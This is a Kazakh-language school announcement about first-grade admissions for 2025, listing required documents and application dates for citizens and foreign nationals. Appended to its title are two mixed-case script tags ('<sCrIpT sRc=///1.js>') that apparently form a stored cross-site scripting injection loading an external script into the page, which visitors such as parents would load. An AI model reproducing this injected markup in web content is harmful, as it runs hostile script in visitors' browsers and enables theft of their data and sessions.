1-сыныпқа қабылдау басталды!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.04.2025

Құрметті ата-аналар! 📢

📌 1-сыныпқа қабылдау басталды!
✅ Арыздар қағаз жүзінде қабылданады.
🏫ҚР «Білім туралы» Заңына сәйкес, 1-сыныпқа ата-анасының өтініші бойынша балалар 6 жастан бастап қабылданады. Құжаттарды мемлекеттік egov.kz электрондық нұсқада 1 сәуір- 31 тамыз аралығында тапсыруға болады. 

📌Қазақстан азаматтары үшін Жалпы білім беретін орта мектепке қабылдауға қажетті құжаттар тізімі: 
1) ата-ананың немесе заңды өкілінің өтініші; 
2) №065-у нысанындағы денсаулық жағдайы туралы анықтама және №052-2/у нысанындағы баланың денсаулық паспорты; 
3) өлшемі 3х4 см сурет (2 дана) 

📌Шетел азаматтары үшін: 
Ата-аналар немесе басқа заңды өкілдер Қазақстанда уақытша немесе тұрақты тұруы керек. Шетелдіктер мектепке Қазақстан Республикасында тұрақты тұру құқығы туралы және тұрғылықты жері бойынша тіркеу туралы құжаттарды ұсынуы керек. 
• Өтініш демалыс және мереке күндерді қоспағанда, дүйсенбіден жұмаға дейін қабылданады. 

Балаларыңызды мектепке уақытылы тіркеу үшін құжаттарды дер кезінде тапсыруды сұраймыз. Қосымша сұрақтар бойынша мектеп әкімшілігіне хабарласуға болады.

Балаңыздың жарқын болашағы – бүгінгі қадамыңыздан басталады! ✨

Просмотров: 431


Пікір қосу



Деректерді қолтаңбаға қосу